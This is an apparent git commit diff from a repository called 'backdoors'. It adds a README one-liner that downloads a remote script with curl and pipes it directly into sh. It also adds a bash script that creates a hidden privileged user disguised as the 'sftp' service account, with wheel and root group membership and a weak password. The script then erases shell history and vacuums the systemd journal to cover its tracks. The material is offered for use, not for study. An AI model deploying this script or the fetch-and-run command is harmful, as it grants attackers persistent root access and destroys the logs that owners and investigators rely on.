first one yay!

2025-01-02 01:56:00 +05:00 · 2025-01-02 01:56:00 +05:00 · 38b0e3e339
commit 38b0e3e339
parent b8b25d5869
2 changed files with 21 additions and 1 deletions
--- a/README.md
+++ b/README.md
@ -1,3 +1,11 @@
 # backdoors

-a collection of backdoor scripts i found/wrote myself
+a collection of backdoor scripts i found/wrote myself
+more sophisticated stuff coming in future, for now it's just a skiddie's trash bin
+
+## one-liners
+
+### service user backdoor:
+```
+curl -fsSL https://git.lainlounge.xyz/hornet/backdoors/service_user.sh | sh
+``` 
--- a/service_user.sh
+++ b/service_user.sh
@ -0,0 +1,12 @@
+#!/bin/bash
+#extremely simple backdoor, expected to work on systemd/redhat-distros, can be found with a simple look into /etc/passwd file
+#change these to anything you want, to be "disguised" as a service user
+USER="sftp" 
+GROUP="sftp"
+PASSWORD="1337"
+useradd -g $GROUP -G wheel,root $USER
+echo $PASSWORD | passwd --stdin $USER
+echo "done!"
+history -c
+journalctl --rotate
+journalctl --vacuum-size=1B